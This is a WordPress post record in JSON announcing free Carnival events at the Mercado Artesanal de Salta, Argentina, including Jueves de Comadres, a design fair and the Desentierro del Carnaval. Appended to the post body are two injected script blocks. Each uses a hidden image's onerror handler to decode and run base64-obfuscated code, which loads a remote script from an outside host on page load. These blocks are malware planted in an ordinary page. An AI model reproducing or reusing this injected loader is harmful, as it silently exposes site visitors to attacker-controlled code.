{"id":2231,"date":"2023-02-15T10:13:03","date_gmt":"2023-02-15T13:13:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2231"},"modified":"2025-08-14T00:23:14","modified_gmt":"2025-08-14T03:23:14","slug":"actividades-gratuitas-por-carnaval-en-el-mercado-artesanal-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2231","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/actividades-gratuitas-por-carnaval-en-el-mercado-artesanal-de-salta-87902\">Actividades gratuitas por Carnaval en el Mercado Artesanal de Salta<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#7d5e0a\"><em>Jueves de comadres, desentierro del carnaval, patio gastron\u00f3mico, venta y exposici\u00f3n de dise\u00f1o y artesan\u00edas, ser\u00e1n algunas de las opciones para que la familia salte\u00f1a y turistas disfruten en la antigua casona.<\/em><\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li>16 de febrero, 20 horas: Jueves de Comadres.<\/li>\n<\/ul>\n\n\n\n<p>La Secretar\u00eda de Cultura de la Provincia, en forma conjunta con las Asociaciones de Artesanos del Mercado Artesanal; Comparsa Los Alegres del Mercado Artesanal; Comparsa Los Inkas del Tawantinsuyo y Asociaci\u00f3n Punto de Dise\u00f1o, llevar\u00e1n a cabo una nutrida agenda de actividades en el marco del Carnaval Salte\u00f1o.<\/p>\n\n\n\n<p>Las actividades se desarrollar\u00e1n en las diferentes instalaciones del Mercado Artesanal de Salta, Av. San Mart\u00edn 2555, todas con entrada gratuita.<\/p>\n\n\n\n<p><strong>Cronograma:<\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5760-actividades-gratuitas-por-carnaval-en-el-mercado-artesanal-de-salta.jpg\" alt=\"\" width=\"306\" height=\"203\"\/><\/figure><\/div>\n\n\n<p>Las mujeres unidas por el comadrazgo se reunir\u00e1n para renovar el compromiso de haberse confiado el acompa\u00f1amiento en la crianza de los ahijados. Es un d\u00eda para revalorizar los lazos y mantener la tradici\u00f3n que se transmite de generaci\u00f3n en generaci\u00f3n.<\/p>\n\n\n\n<p>Al comp\u00e1s de las cajas entonar\u00e1n coplas picarescas que narran costumbres y cuestionan al compadre, dejando en claro que son las m\u00e1s divertidas. Este d\u00eda se festeja el jueves previo a la celebraci\u00f3n del Carnaval y las protagonistas son las mujeres.<\/p>\n\n\n\n<p>Encuentro de comadres, canto de copleras, bendici\u00f3n de trajes de la Comparsa Los Alegres del Mercado Artesanal y chayada en el moj\u00f3n.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Del 18 de febrero al 3 de marzo de 10 a 20:30 horas: Venta y exposici\u00f3n de dise\u00f1o \u201cCarnaval en Punto\u201d. Inauguraci\u00f3n: 18 de febrero, 13:30 horas.<\/li>\n<\/ul>\n\n\n\n<p>La muestra inspirada en el Carnaval, ofrecer\u00e1 producciones exclusivas de SIETE PUEBLOS de Milagro L\u00f3pez Amorelli; AMANO de Ana Mar\u00eda Caz\u00f3n; EL ARTE SANA de Mar\u00eda Fernanda Meinardy; TEJIDO BONITO de Lili\u00e1n Gabriela Pernas; VIVIGURUMI AMIGURUMIS de Viviana Montelongo; AWA de Lucrecia M\u00f3nica Zubieta; LAS YUCHANAS de Ivanna Costantini; INSPIRADA de Edith Loto y OBJETOS DE AGRADO de Solana Catal\u00e1n.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5761-actividades-gratuitas-por-carnaval-en-el-mercado-artesanal-de-salta.jpg\" alt=\"\" width=\"374\" height=\"248\"\/><\/figure><\/div>\n\n\n<ul class=\"wp-block-list\">\n<li>18 de febrero, 12 horas: Patio gastron\u00f3mico. 15 horas: Ceremonia central del Desentierro del Carnaval.<\/li>\n<\/ul>\n\n\n\n<p>El desentierro y entierro del diablo del Carnaval es un rito milenario de los pueblos del norte argentino.<\/p>\n\n\n\n<p>Los miembros de las comparsas enmascaran sus rostros y se disfrazan con trajes coloridos, como si el diablo se apoderara de sus cuerpos y los uniera en endiablados bailes en los que cada uno de los participantes recupera su identidad. La tradici\u00f3n sostiene que cuando abandonan la vestimenta se inhiben.<\/p>\n\n\n\n<p>En la ceremonia el Pujllay es alzado como un trofeo, s\u00edmbolo de la rebeld\u00eda que se avecina. Acompa\u00f1ados del baile y la m\u00fasica, en estos rituales no puede faltar el alcohol, cigarros, hojas de coca, harina, talco, serpentina y la albahaca.<\/p>\n\n\n\n<p>Durante las jornadas, los locales de artesan\u00edas y gastronom\u00eda regional de la Provincia estar\u00e1n abiertos al p\u00fablico de 10 a 20:30 horas.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Actividades gratuitas por Carnaval en el Mercado Artesanal de Salta\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/bUwMkU6Uwzk?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><figcaption class=\"wp-element-caption\"> <\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Jueves de comadres, desentierro del carnaval, patio gastron\u00f3mico, venta y exposici\u00f3n de dise\u00f1o y artesan\u00edas, ser\u00e1n algunas de las opciones para que la familia salte\u00f1a y turistas disfruten en la antigua casona. La Secretar\u00eda de Cultura de la Provincia, en forma conjunta con las Asociaciones de Artesanos del Mercado Artesanal; Comparsa Los Alegres del Mercado [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2232,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2231","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2231"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2231"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2231\/revisions"}],"predecessor-version":[{"id":7175,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2231\/revisions\/7175"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2232"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2231"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2231"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2231"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}